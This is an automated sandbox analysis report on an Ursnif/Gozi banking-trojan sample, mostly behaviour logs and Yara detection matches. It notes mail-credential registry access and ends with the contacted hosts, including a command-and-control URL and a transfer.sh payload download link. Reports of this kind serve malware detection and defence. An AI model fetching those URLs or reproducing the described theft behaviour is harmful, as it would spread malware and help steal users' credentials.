Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior

Contains functionality to query CPU information (cpuid)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 8_2_010A42A6 cpuid

8_2_010A42A6

Source: C:\Users\user\Desktop\gozi.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 8_2_00401C44 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,

8_2_00401C44

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 8_2_010A42A6 wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

8_2_010A42A6

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 8_2_03F1C557 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError,

8_2_03F1C557

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 8_2_004017A0 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

8_2_004017A0

Stealing of Sensitive Information:

Yara detected Ursnif

Source: Yara match	File source: 0000001C.00000003.532875532.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392490032.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.826395409.00000163C5A02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.672226246.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.671882459.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392591901.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.473440748.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.671987567.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392517903.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.541235990.0000020FDF04C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.672047552.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392607938.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.671936053.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.473486452.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.540930276.0000020FDF04C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.457301811.00000000043A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392570642.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.672143247.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.473394409.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.541170125.0000020FDF04C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.473504593.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.825382176.000001B91FF02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.405030349.000000000320C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392542209.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.395416668.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.672170468.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000002.673705435.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.543904492.0000020FDF04C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 5696, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: control.exe PID: 5676, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4364, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4084, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4176, type: MEMORYSTR
Source: Yara match	File source: 8.3.RegAsm.exe.330a4a0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.RegAsm.exe.330a4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.RegAsm.exe.33b8f40.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.RegAsm.exe.33894a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000024.00000000.539555209.0000020FDEA80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000000.652250920.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.568184534.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.609566601.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.468518313.0000000000E50000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.523377381.000000000308F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.563482706.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.615563963.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000000.655957739.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000000.648045274.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.470699283.0000000000E50000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.537792307.0000020FDEA80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.572793373.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.398744797.0000000003389000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.472358807.0000000000E50000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.535827896.0000020FDEA80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.824135960.00000163C5171000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000002.819337222.000001EAE4571000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.621795530.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.542236121.0000000000E51000.00000020.00020000.sdmp, type: MEMORY

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality:

Yara detected Ursnif

Source: Yara match	File source: 0000001C.00000003.532875532.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392490032.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.826395409.00000163C5A02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.672226246.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.671882459.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392591901.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.473440748.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.671987567.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392517903.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.541235990.0000020FDF04C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.672047552.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392607938.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.671936053.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.473486452.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.540930276.0000020FDF04C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.457301811.00000000043A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392570642.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.672143247.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.473394409.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.541170125.0000020FDF04C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.473504593.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.825382176.000001B91FF02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.405030349.000000000320C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392542209.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.395416668.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.672170468.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000002.673705435.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.543904492.0000020FDF04C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 5696, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: control.exe PID: 5676, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4364, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4084, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4176, type: MEMORYSTR
Source: Yara match	File source: 8.3.RegAsm.exe.330a4a0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.RegAsm.exe.330a4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.RegAsm.exe.33b8f40.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.RegAsm.exe.33894a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000024.00000000.539555209.0000020FDEA80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000000.652250920.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.568184534.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.609566601.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.468518313.0000000000E50000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.523377381.000000000308F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.563482706.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.615563963.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000000.655957739.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000000.648045274.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.470699283.0000000000E50000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.537792307.0000020FDEA80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.572793373.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.398744797.0000000003389000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.472358807.0000000000E50000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.535827896.0000020FDEA80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.824135960.00000163C5171000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000002.819337222.000001EAE4571000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.621795530.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.542236121.0000000000E51000.00000020.00020000.sdmp, type: MEMORY

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
144.76.136.153	transfer.sh	Germany		24940	HETZNER-ASDE	false
185.189.12.123	io.immontyr.com	Russian Federation		50113	SUPERSERVERSDATACENTERRU	false

Contacted Domains

Name	IP	Active
myip.opendns.com	102.129.143.64	true
resolver1.opendns.com	208.67.222.222	true
transfer.sh	144.76.136.153	true
io.immontyr.com	185.189.12.123	true
apr.intooltak.com	185.189.12.123	true
222.222.67.208.in-addr.arpa	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://io.immontyr.com/cG9R2yLu/hwY1VC7UV0FGuTFHUDuWv94/dWPB0qINsS/UcOtH5ibuFGkRtRRz/TcTs3WrbL3kk/KH9_2B01P5_/2BqOCU5VAuO8RX/tDtOsh5JefONIGFgJjwJW/WTNQ_2BigLNUfSTv/vEQOtss42jXAD7m/Vb_2FBrZFcmnzVx4eL/FgvV_2F2J/WJxkKD87XHV59J1BIptx/grHAayUrM6ZXOpWMd4b/m8CaZcQ61hUgT0Er2sN6yR/jqxJkoogaoGBQ/oxZTsR50/IU6qlhp0LlHnTmpxFkzazjn/ZXLdcjlESY/R9eDED1XHAy_2FpXA/QYirrLarjNjS/_2Faftuam8rF_2F/1Ew	true	Avira URL Cloud: safe	unknown
https://transfer.sh/get/3dvhcv/lia.exe	false		high
